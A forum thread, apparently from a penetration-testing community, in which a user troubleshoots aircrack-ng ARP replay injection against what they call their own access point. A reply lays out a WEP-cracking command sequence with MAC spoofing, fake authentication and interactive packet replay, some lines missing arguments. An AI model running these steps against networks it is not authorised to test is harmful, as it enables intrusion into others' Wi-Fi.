Results 1 to 4 of 4

Thread: Cant get Arp Request..(0 pps packet sent)

  1. #1
    Just burned his ISO
    Join Date
    Jun 2011
    Location
    Albania, Gjirokaster
    Posts
    18

    Exclamation Cant get Arp Request..(0 pps packet sent)

    hi all... i have a problem with injecting packets.... my wireless driver is :

    Interface Chipset Driver

    wlan0 Atheros AR2425 ath5k - [phy0]

    when i test it with aireplay-ng -9 -b {my ap mac adress} it says injection working...
    i use:
    airmon-ng start wlan0
    airodump-ng mon0
    airodump-ng -w wep -c 1 -b {my ap mac} mon0
    aireplay-ng -1 0 -a [my ap mac] -h [my wireless mac] mon0 " association succesfull AID=1 ""
    aireplay-ng -3 -b [ap mac] -h [wireless mac] mon0

    i wait and wait and wait so much but nothing.....
    it says waiting for beacon frame on BSSID : [my ap mac]... and 0 packets sent....0 arp request.....

    anyone can help me pleaseeee?

    hi all... i have a problem with injecting packets.... my wireless driver is :

    Interface Chipset Driver

    wlan0 Atheros AR2425 ath5k - [phy0]

    when i test it with aireplay-ng -9 -b {my ap mac adress} it says injection working...
    i use:
    airmon-ng start wlan0
    airodump-ng mon0
    airodump-ng -w wep -c 1 -b {my ap mac} mon0
    aireplay-ng -1 0 -a [my ap mac] -h [my wireless mac] mon0 " association succesfull AID=1 ""
    aireplay-ng -3 -b [ap mac] -h [wireless mac] mon0

    i wait and wait and wait so much but nothing.....
    it says waiting for beacon frame on BSSID : [my ap mac]... and 0 packets sent....0 arp request.....

    anyone can help me pleaseeee?

    hi all... i have a problem with injecting packets.... my wireless driver is :

    Interface Chipset Driver

    wlan0 Atheros AR2425 ath5k - [phy0]

    when i test it with aireplay-ng -9 -b {my ap mac adress} it says injection working...
    i use:
    airmon-ng start wlan0
    airodump-ng mon0
    airodump-ng -w wep -c 1 -b {my ap mac} mon0
    aireplay-ng -1 0 -a [my ap mac] -h [my wireless mac] mon0 " association succesfull AID=1 ""
    aireplay-ng -3 -b [ap mac] -h [wireless mac] mon0

    i wait and wait and wait so much but nothing.....
    it says waiting for beacon frame on BSSID : [my ap mac]... and 0 packets sent....0 arp request.....

    anyone can help me pleaseeee?
    Last edited by Archangel-Amael; 06-12-2011 at 08:13 PM.

  2. #2
    Just burned his ISO
    Join Date
    May 2011
    Posts
    10

    Default Re: Cant get Arp Request..(0 pps packet sent)

    Do you have any clients connected to your AP?

  3. #3
    Just burned his ISO
    Join Date
    Oct 2010
    Posts
    6

    Default Re: Cant get Arp Request..(0 pps packet sent)

    If you have teamviewer I can help you , also try this attack :

    ifconfig wlan0 down
    macchanger -m 00:11:22:33:44:55 wlan0
    ifconfig wlan0 up
    airmon-ng start wlan0
    airodump-ng -c -b -w wlan0

    Shell number 2 :
    aireplay-ng -1 0 -a wlan0
    aireplay-ng -1 0 -a mon0

    Shell number 3 :
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -a -x 200 mon0

    aireplay will start reading packets for -p 0841 attack and it will ask you wold you like to use this packet (y/n) :
    Don't enter anything , leave it like that , then go back to shell number 2 , and do :
    aireplay-ng -1 0 -a mon0
    aireplay-ng -1 6666 -a wlan0

    then go back to shell number 3 and enter y

    I supose that you are not a begginer in WIFI but anyway :
    wlan0 - managed interface
    mon0 - monitor interface
    Change interfaces to those that you have.
    -c -- channel of AP
    -w -- output file
    -a -- BSSID of AP [ MAC address ]
    -b -- same as -a
    -x -- number of packets , can change it as you like , for me 200 is optimal

    So try it

  4. #4
    Just burned his ISO
    Join Date
    Jun 2011
    Location
    Albania, Gjirokaster
    Posts
    18

    Default Re: Cant get Arp Request..(0 pps packet sent)

    Thank you i solved it!

Similar Threads

  1. Request: The Art of Fuzzing
    By morning_wood in forum Tool Requests
    Replies: 1
    Last Post: 07-16-2010, 08:59 AM
  2. Request help on tkiptun-ng
    By pigtail23 in forum Beginners Forum
    Replies: 5
    Last Post: 07-15-2010, 12:00 PM
  3. Replies: 2
    Last Post: 04-25-2008, 08:39 AM
  4. request for bt3
    By linuxbeast in forum OLD BT3beta General
    Replies: 1
    Last Post: 04-14-2008, 08:08 AM
  5. ARP Request + de-authentication
    By MeAndMyFriends in forum OLD Newbie Area
    Replies: 21
    Last Post: 04-12-2008, 04:22 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •